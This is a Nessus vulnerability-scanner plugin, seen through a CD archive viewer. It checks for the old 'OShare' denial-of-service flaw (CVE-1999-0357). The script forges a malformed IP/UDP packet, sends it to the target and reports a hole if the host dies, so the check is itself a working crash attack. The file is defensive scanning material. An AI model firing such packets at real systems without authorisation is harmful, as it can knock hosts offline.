home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / oshare.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  85 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. # This attack is very unlikely to work from a large number
  8. # of systems which check ip->ip_len before sending the packets.
  9. #
  10.  
  11. if(description)
  12. {
  13.  script_id(10170);
  14.  script_version ("$Revision: 1.13 $");
  15.  script_cve_id("CVE-1999-0357");
  16.  name["english"] = "OShare";
  17.  name["francais"] = "OShare";
  18.  script_name(english:name["english"], francais:name["francais"]);
  19.  
  20.  desc["english"] = "
  21. It was possible to crash the remote
  22. system using the 'oshare' attack.
  23.  
  24. An attacker may use this problem
  25. to prevent your site from working
  26. properly.
  27.  
  28. Solution : contact your vendor for
  29. a patch.
  30.  
  31. Risk factor : High";
  32.  
  33.  desc["francais"] = "
  34. Il s'est avΘrΘ possible de tuer
  35. la machine distante via l'attaque 'oshare'.
  36.  
  37. Un pirate peut utiliser ce problΦme pour
  38. empecher votre rΘseau de fonctionner
  39. correctement.
  40.  
  41. Solution : contactez votre vendeur et
  42. demandez un patch.
  43.  
  44. Facteur de risque : SΘrieux";
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes the remote host using the 'oshare' attack";
  49.  summary["francais"] = "Tue la machine distante via l'attaque 'oshare'";
  50.  
  51.  script_summary(english:summary["english"], francais:summary["francais"]);
  52.  
  53.  script_category(ACT_KILL_HOST);
  54.  
  55.  
  56.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  57.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  58.  family["english"] = "Denial of Service";
  59.  family["francais"] = "DΘni de service";
  60.  
  61.  script_family(english:family["english"], francais:family["francais"]);
  62.  
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70.  
  71. ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
  72.              ip_tos : 0, ip_id : rand(), ip_off : 16383,
  73.              ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
  74.              ip_src : this_host());
  75.  
  76. start_denial();
  77. send_packet(ip, pcap_active:FALSE);
  78.              
  79. alive = end_denial();
  80. if(!alive){
  81.         security_hole(0);
  82.         set_kb_item(name:"Host/dead", value:TRUE);
  83.       }     
  84.         
  85.